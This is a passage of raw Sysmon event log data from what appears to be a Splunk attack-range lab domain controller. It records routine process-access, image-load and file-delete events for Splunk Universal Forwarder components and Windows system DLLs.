13:05:47.560{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.560{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.561{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000100076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.076{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.076{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.076{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:48.716{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D3050E75943D4D9AD78FBC231D742CF,SHA256=FAFBB8C9E93492444B517B6B9BB22DBFE9FD9F7312983A82A75C3DEA08C66179,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}63445016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.857{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=275545B1A7A14467C5D22A377577532F,SHA256=D90FC783CC7233704B6020E089FAC2DE5C4781C1E185F419DCF9FBB1E0C6883F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.732{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.716{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program 